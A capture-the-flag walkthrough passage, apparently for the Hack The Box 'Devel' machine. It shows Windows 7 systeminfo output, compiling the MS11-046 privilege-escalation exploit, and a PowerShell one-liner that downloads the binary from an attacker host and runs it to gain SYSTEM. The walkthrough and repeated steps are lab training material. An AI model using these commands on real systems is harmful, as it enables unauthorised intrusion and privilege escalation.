Post Exploitation

c:\Users>systeminfo
systeminfo

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:   
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31 ��
System Boot Time:          23/11/2020, 1:43:00 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.023 MB
Available Physical Memory: 682 MB
Virtual Memory: Max Size:  2.047 MB
Virtual Memory: Available: 1.497 MB
Virtual Memory: In Use:    550 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.5

c:\Users>

Looking at the above commands the three things that stand out are:

OS Name: Microsoft Windows 7 Enterprise
System Type: X86-based PC
Hotfixes(s): N/A

Upon googling we find the follwing exploit

We have to download in on our Kali machine and compile using the following:

i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32

Transfer file to Windows machine and Execute

Set up HTTPServer and on the target machine type the following:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.34:5555/MS11-046.exe', 'c:\Users\Public\Downloads\MS11-046.exe')"

c:\Users\Public\Downloads>MS11-046.exe
MS11-046.exe

c:\Windows\System32>whoami
whoami
nt authority\system

c:\Windows\System32>

PreviousExploitation NextLegacy (comeback to )

Last updated 4 years ago

Was this helpful?

c:\Users>systeminfo systeminfo Host Name: DEVEL OS Name: Microsoft Windows 7 Enterprise OS Version: 6.1.7600 N/A Build 7600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Workstation OS Build Type: Multiprocessor Free Registered Owner: babis Registered Organization: Product ID: 55041-051-0948536-86302 Original Install Date: 17/3/2017, 4:17:31 �� System Boot Time: 23/11/2020, 1:43:00 �� System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: X86-based PC Processor(s): 1 Processor(s) Installed. [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: el;Greek Input Locale: en-us;English (United States) Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul Total Physical Memory: 1.023 MB Available Physical Memory: 682 MB Virtual Memory: Max Size: 2.047 MB Virtual Memory: Available: 1.497 MB Virtual Memory: In Use: 550 MB Page File Location(s): C:\pagefile.sys Domain: HTB Logon Server: N/A Hotfix(s): N/A Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) PRO/1000 MT Network Connection Connection Name: Local Area Connection DHCP Enabled: No IP address(es) [01]: 10.10.10.5 c:\Users>

Transfer file to Windows machine and Execute

Set up HTTPServer and on the target machine type the following:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.34:5555/MS11-046.exe', 'c:\Users\Public\Downloads\MS11-046.exe')"

c:\Users\Public\Downloads>MS11-046.exe
MS11-046.exe

c:\Windows\System32>whoami
whoami
nt authority\system

c:\Windows\System32>